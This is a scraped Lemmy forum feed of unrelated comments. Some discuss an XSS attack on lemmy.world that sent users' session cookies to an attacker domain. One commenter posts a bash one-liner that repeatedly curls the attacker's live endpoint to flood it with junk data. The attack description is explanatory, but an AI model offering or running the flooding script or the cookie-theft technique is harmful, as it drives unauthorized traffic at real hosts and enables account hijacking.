This is very interesting, but the conspiracy is almost certainly untrue. Titanic and Olympic had a lot of differences between them that wouldn’t be easy to switch. Additionally, the circumstances of the wreak don’t really lend themselves to insurance fraud, there was very little deviation from standard procedures of the time, though those procedures would prove woefully inadequate.
There are niche reddit communities I might still interact with.
But I have a combo of NoScript/adblock/ublock origin hard mode and a cancelled premium making sure they don’t get a penny from me, and I’ll prefer to post any useful info on Lemmy instead.
Coming from the Reddit is Fun app, I tried Jerboa first, thought it was fine, then tried Liftoff and it feels a lot better to me so far. But I’m still new to this universe, so I might try other apps and change my mind! Loving the diversity so far at least!
I’m also a RIF refugee. Liftoff is the first app I’ve tried for Lemmy. Overall I’m pretty happy. The updates get better and better. I’m still leaning how to Lemmy, but I really like it so far. One of the few things throwing me off at the moment is that I either can’t or don’t know how to easily tell what posts I’ve already seen. RIF would change the color of the text from white to blue. If they can add that then I’ll have nothing to complain about.
Hey, I can tell you want it does. While I don’t know if they try to download something too (while it really doesn’t look like it), they are trying to steal your browser cookies.
I haven’t removed the obfuscation yet as I am literally in bed but I can tell the general idea of the code.
Onload is a html attribute. Html attribute tell your browser more about what the browser should be doing. So basically onload is an instruction to your browser. By posting those comments, they try to run something called cross site scripting. Basically they want to run their code in your browser without them being the website owner. So now we know the intend of the post, let’s look into the details.
Onload is an attribute that tells the browser to do something once it is fully loaded.
Fetch is a function that allows your browser to request additional information from the server. Endless scrolling would be done with that.
String.fromcharcode is just there to hide a little bit. Think of it as a fancy way to say a word. they are saying a website to connect to there.
Then document.cookie are your cookies for that website.
The next thing is probably your username or something.
So what does that mean? They try to make your browser execute their code when the website is onloaded. The code sends your cookies and your username(?) To a server. They probably save the username and cookie and try to steal the account later.
You seeing the code is good evidence that your browser hasn’t execute the code as the browser didn’t understand it as code to be executed but code to display. So you are probably safe and don’t need to worry
Edit: ups sorry for not answering the question. I don’t know which client they are targeting. They might or might not be targeting wefwef. But they target you, the user, too. And it is probably for Webbrowser users, so chances are wefwef or other web clients.
Edit edit: some people pointed out that it is not the username but basically the admin status of the account.
Especially the last one might cause the most work, because the “modern web development environment” simply cannot provide this. Also: form-action ‘none’; should be validated. It should be set to self if forms are actually used to send data to the server and not handled by Javascript.
The encoded string contains the URL zelensky dot zip. Zip is one of the newer top-level domains. It itself is not a zip file, but I am not going to visit that site to find out whatever treasures it has to offer…
i think i understand that part but why is this specific event “another reason to block this TLD”? can’t they just use any TLD for this and achieve the same thing? is there another inherit security issue with .zip that doesn’t exist with other domains?
gotcha ok i think i’m getting it. just to make sure i’m not missing anything, you’re saying that in this case it didn’t matter as in the end they could use any TLD and achieve the same effect.
but in general, threat actors hope to confuse people into thinking this “.zip” TLDs are only referencing local files instead of web addresses. right?
Haha, what a great idea! I love it! Sending me a signal about things you don’t want me to record!
I would build two things. First, an antenna that detects and (using multiple copies) locates these signals on a real time, public-access map.
Second, I’d build a security camera with a wide angle lens that turns ON whenever this signal is received.
Sure, 90% of people don’t know how to do these things – but I do, and I can put them in a store and the results on a website. Most people know how to buy a thing and plug it in, or access a website!
Then I’ll manufacture a ton of them at a factory here in Vietnam, and you will be able to buy them at a reasonable price. I’ll make a tidy sum, pay a bunch of taxes that will build highways and schools, and you’ll have more freedom than you started with.
I’m less successfully mercenary, though, so I know what I assume is a representative sample of tech muggles. Having thought about it, 1% of people could figure this out, and maybe 0.1% wouldn’t have to use other people’s tools to do it.
Hm, uniting people in general is like herding cats. Uniting hermits? Sounds hard. I’ll stick to science :D
Being mercenary is largely overrated – better to try and live a calm and happy life filled with friends and family.
Many opinions have been offered on whether the most valuable attribute in warfare (and by this I mean business) is loyalty or bravery, but few people are willing to admit it’s actually just hunger.
Lemmy.world instance under attack right now. It was previously redirecting to 🍋 🎉 and the title and side bar changed to antisemitic trash.
They supposedly attributed it to a hacked admin account and was corrected. But the instance is still showing as defaced and now the page just shows it was “seized by reddit”.
Seems like there is much more going on right now and the attackers have much more than a single admin account.
Must be some boomer if they know what lemon party is, lmao. It’s been a hot minute since lemon party, one man one jar, or two girls one cup were being talked about.
Linking to lemonparty and saying “seized by reddit” strikes me as the playbook of an old 4chan troll/raid, trying to instigate more drama between two places they both hate at once.
From OPs screenshot, I noticed the JS code is attempting to extract the session cookie from the users that click on the link. If it’s successful, it attempts to exfiltrate to some server otherwise sends an empty value.
You can see the attacker/spammer obscures the url of the server using JS api as well.
May be how lemmy.world attackers have had access for a lengthy period of time. Attackers have been hijacking sessions of admins. The one compromised user opened up the flood gates.
Not a sec engineer, so maybe someone else can chime in.
Here’s a quick bash script if anyone wants to help flood the attackers with garbage data to hopefully slow them down: while true; do curl https://zelensky.zip/save/$(echo $(hostname) $(date) | shasum | sed ‘s/.{3}$//’ | base64); sleep 1; done
Once every second, it grabs your computer name and the current system time, hashes them together to get a completely random string, trims off the shasum control characters and base64 encodes it to make everything look similar to what the attackers would be expecting, and sends it as a request to the same endpoint that their xss attack uses. It’ll run on Linux and macOS (and windows if you have a WSL vm set up!) and uses next to nothing in terms of system resources.
Not sure, I wasn’t that long after you and I started getting HTML responses back from the page. Standard Russian Propaganda that doesn’t need to be repeated here - if you’ve seen the claims once you’ve seen 'em a million times!
I did take the steps of reporting this abuse to cloudflare (who they’re using for DDOS protection) and their registrar.
Why would you include your hostname in the hash? That just sounds like an invitations for a mistake to leak semi-private telemetry data.
Come to think of it… Isn’t obscured telemetry exactly what your suggestion is doing? If they get or guess your hostname by other means, then they have a nice timestamped request from you, signed with your hostname, every second
It’s essentially to add a unique salt to each machine that’s doing this, otherwise they’d all be generating the same hash from identical timestamps. Afaik, sha hashes are still considered secure; and it’s very unlikely they’d even try to crack one. But even if they did try and were successful, there isn’t really anything nefarious they can do with your machines local name.
Learning about Space. There we’re working miniature prototypes of a ship to get humans up to 12% of Speed of Light. Project Orion worked by blasting nuclear bombs behind a ram jets once per second.
Considering how quickly the third party system is coming up for Lemmy, I envision my reddit engagement to drop to zero soon enough. For now, Lemmy just doesn’t have all the info that Reddit has and that is fine considering Reddit has been there for a long while
asklemmy
Newest
This magazine is from a federated server and may be incomplete. Browse more on the original instance.